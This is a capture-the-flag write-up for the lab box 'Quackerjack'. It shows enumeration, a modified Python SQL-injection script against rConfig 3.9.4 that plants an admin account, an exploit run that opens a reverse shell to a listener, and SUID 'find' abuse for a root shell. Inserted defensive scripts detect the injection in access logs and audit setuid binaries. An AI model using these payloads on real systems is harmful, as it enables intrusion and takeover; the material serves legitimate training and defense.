Quackerjack - OSPG
Summary Of Result
We gain an initial foothold by exploiting a vulnerable version of rConfig - Configuration Management
application. We then escalate our privileges via a misconfigured SUID binary.
Attack Narrative
The general attack is wrapped up into three main phases:
- Enumeration
- Exploitation
- Privilege Escalation
Enumeration
Nmap
We will begin with an nmap scan:
# nmap -sV -p- -A -Pn $IP -oA nmap/services
21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.2
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.4 (protocol 2.0)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
111/tcp open rpcbind syn-ack ttl 63 2-4 (RPC #100000)
139/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: SAMBA)
445/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 4.10.4 (workgroup: SAMBA)
3306/tcp open mysql syn-ack ttl 63 MariaDB (unauthorized)
8081/tcp open ssl/http syn-ack ttl 63 Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
- There are several services running on the system; we specifically target HTTPS on port 8081.
Web Application Port 8081
Navigating to the application, we can directly spot a couple of interesting pieces of information:
- Running rConfig - Configuration Management.
- Version 3.9.4 → Vulnerable?
After some research, we discover that the running rConfig version is actually vulnerable to Remote Code Execution.
# searchsploit rConfig 3.9.4
---------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------- ---------------------------------
rConfig 3.9.4 - 'search.crud.php' Remote Command Injection | php/webapps/48241.py
rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution | php/webapps/48261.py
---------------------------------------------------------------------------- ---------------------------------
Exploitation
As stated in the official documentation, the default credentials are admin:admin. However, that might not be the case here.
According to the results of the previous searchsploit command, we can potentially execute either script and end up with a reverse shell.
- The second script (searchField) utilizes SQL Injection to create an admin user → login as admin → abuse the ajaxArchiveFiles.php file to execute a malicious payload.
- The first script (search.crud.php) exploits the search.crud.php file and the nodeId parameter to obtain a reverse shell.
Unfortunately, neither works out of the box: the second script fails to return a reverse shell, while the first script needs a valid admin credential to succeed.
We can try to brute force the admin credentials with the username admin. However, we can also combine the two scripts and make our exploit work. As mentioned, the second script creates an admin user by exploiting the SQL Injection vulnerability, but the script needs to be modified. Otherwise, it won't work.
The following is the modified script, which can be used to create a valid admin user:
#!/usr/bin/python3
import requests
import sys
import random
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

if len(sys.argv) != 2:
    print("[+] Usage : ./rconfig_exploit.py https://target")
    exit()

target = sys.argv[1]
# Unauthenticated endpoint and the query string whose searchField parameter is injectable
vuln_page = "/commands.inc.php"
vuln_parameters = "?searchOption=contains&searchField=vuln&search=search&searchColumn=command"

print("[+] Adding a temporary admin user...")
fake_id = str(random.randint(200, 900))
fake_user = "attacker"
fake_pass_md5 = "21232f297a57a5a743894a0e4a801fc3"  # md5 hash of 'admin'
fake_userid_md5 = "6c97424dc92f14ae78f8cc13cd08308d"
# Stacked INSERT appended to searchField, creating the admin user described above
addUserPayload = "%20;INSERT%20INTO%20`users`%20(`id`,%20`username`,%20`password`,%20`userid`,%20`userlevel`,%20`email`,%20`timestamp`,%20`status`)%20VALUES%20(" + fake_id + ",%20'" + fake_user + "',%20'" + fake_pass_md5 + "',%20'" + fake_userid_md5 + "',%209,%20'" + fake_user + "@domain.com',%201346920339,%201);--"
encoded_request = target + vuln_page + vuln_parameters + addUserPayload

firstrequest = requests.session()
exploit_req = firstrequest.get(encoded_request, verify=False)

# Credentials of the newly created user; the login itself is done afterwards through the web UI
request = requests.session()
login_info = {
    "user": fake_user,
    "pass": "admin",
    "sublogin": 1
}
print("[+] Authenticating as: " + fake_user + ":admin ...")
print("[+] Done.")
After executing the above script, we should be able to log in with the credentials attacker:admin. Now that we have valid credentials, we can procure a reverse shell using the first script.
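From the defender's side, the request the script above sends leaves a distinctive trace in the web server's access log: a GET to commands.inc.php whose searchField carries a URL-encoded SQL statement. The following detection script is an added example, not part of the original write-up or of rConfig; it parses Apache combined-format access-log lines (the three sample lines are constructed here) and flags requests to that endpoint whose decoded query parameters contain SQL statement keywords.

```python
import re
from urllib.parse import urlsplit, unquote, unquote_plus

# Constructed sample access-log lines (not taken from the original page):
# a benign search, a request shaped like the stacked INSERT described above, and an unrelated POST.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2021:12:00:01 +0000] "GET /commands.inc.php?searchOption=contains&searchField=show%20ip&search=search&searchColumn=command HTTP/1.1" 200 1532
10.0.0.9 - - [10/Mar/2021:12:00:07 +0000] "GET /commands.inc.php?searchOption=contains&searchField=vuln%20;INSERT%20INTO%20%60users%60%20(%60id%60,%60username%60)%20VALUES%20(321,'attacker');--&search=search&searchColumn=command HTTP/1.1" 200 1532
10.0.0.9 - - [10/Mar/2021:12:01:00 +0000] "POST /login.php HTTP/1.1" 302 0
"""

# Apache combined/common log format: client, ident, user, [timestamp], "METHOD URI PROTO", status
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

# Multi-word SQL statement heads; a configuration search field has no legitimate reason to carry them.
SQL_RE = re.compile(
    r"\b(INSERT\s+INTO|UNION\s+SELECT|UPDATE\s+\w+\s+SET|DELETE\s+FROM|DROP\s+TABLE)\b",
    re.IGNORECASE,
)


def query_params(query):
    """Split a raw query string on '&' only and percent-decode each name and value.

    Done by hand rather than with parse_qs because older Python versions also split
    on ';', which would hide exactly the stacked-statement separator we care about.
    """
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params.setdefault(unquote(name), []).append(unquote_plus(value))
    return params


def suspicious_params(uri):
    """Return {param: decoded value} for commands.inc.php query parameters containing SQL."""
    parts = urlsplit(uri)
    if not parts.path.endswith("commands.inc.php"):
        return {}
    hits = {}
    for name, values in query_params(parts.query).items():
        for value in values:
            if SQL_RE.search(value):
                hits[name] = value
    return hits


def scan_log(text):
    """Return one alert per log line whose request to commands.inc.php looks like SQL injection."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = suspicious_params(m.group("uri"))
        if hits:
            alerts.append({"src": m.group("src"), "ts": m.group("ts"),
                           "status": m.group("status"), "params": hits})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f"[!] {alert['ts']} {alert['src']} -> {alert['params']}")
```

Run it against a real access log by replacing SAMPLE_LOG with the file contents. The status code is carried in each alert on purpose: a 200 on the injected request tells you the application accepted it, which is the signal to check the users table for rows you did not create, and the source address ties the follow-up login to the same client.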
# python3 48241.py https://192.168.78.57:8081 attacker admin 192.168.49.78 80
...
Our listener caught the reverse shell on port 80 as the apache user.
# nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.49.78] from (UNKNOWN) [192.168.78.57] 56142
bash: no job control in this shell
bash-4.2$ whoami
whoami
apache
Privilege Escalation
SUID
Local enumeration of the target reveals that /usr/bin/find is a SUID binary.
bash-4.2$ find / -perm -4000 -ls 2>/dev/null
12596477 196 -rwsr-xr-x 1 root root 199304 Oct 30 2018 /usr/bin/find
[...]
SUID Abuse
Leveraging the find SUID binary, we can easily acquire a root shell.
bash-4.2$ find . -exec /bin/bash -p \;
bash-4.2# whoami
root
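The mitigation is a periodic audit of setuid binaries against a known baseline, with anything outside it reported together with the fix. The script below is an added example, not part of the original write-up; the baseline set is an assumption for a typical CentOS 7 host and should be replaced with the one recorded for the system being audited, and the sample entries are constructed to mirror the ls output above.

```python
import os
import stat

# Assumed baseline of root-owned setuid binaries expected on a CentOS 7 host.
# Replace with the list recorded from a known-good build of the audited system.
BASELINE = {
    "/usr/bin/su", "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/chage",
    "/usr/bin/chsh", "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/crontab", "/usr/bin/pkexec", "/usr/sbin/unix_chkpwd",
}

# Pseudo filesystems that are skipped when walking the real disk
SKIP_PREFIXES = ("/proc", "/sys", "/dev", "/run")


def is_setuid(mode):
    """True for a regular file whose setuid bit is set (the 's' in -rwsr-xr-x)."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def audit_entries(entries, baseline=BASELINE):
    """entries: iterable of (path, st_mode, st_uid). Returns findings for setuid files outside the baseline."""
    findings = []
    for path, mode, uid in entries:
        if not is_setuid(mode) or path in baseline:
            continue
        findings.append({
            "path": path,
            "owner_uid": uid,
            "mode": oct(stat.S_IMODE(mode)),
            "fix": f"chmod u-s {path}",
        })
    return findings


def walk_filesystem(root="/"):
    """Yield (path, st_mode, st_uid) for every regular file under root, skipping pseudo filesystems."""
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath.startswith(SKIP_PREFIXES):
            dirnames[:] = []
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            yield path, st.st_mode, st.st_uid


# Constructed sample mirroring the enumeration output above: find is setuid root, ls is not.
# 0o104755 = regular file | setuid | rwxr-xr-x
SAMPLE_ENTRIES = [
    ("/usr/bin/find", 0o104755, 0),
    ("/usr/bin/passwd", 0o104755, 0),
    ("/usr/bin/ls", 0o100755, 0),
]


if __name__ == "__main__":
    for f in audit_entries(walk_filesystem()):
        print(f"[!] unexpected setuid file {f['path']} (uid {f['owner_uid']}, mode {f['mode']}) -> {f['fix']}")
```

Against the sample entries only /usr/bin/find is reported, since passwd is in the baseline and ls has no setuid bit. In production the baseline should be the set of setuid paths captured from a freshly built host of the same image, so that a binary that gained the bit later, as find did here, stands out on the next run.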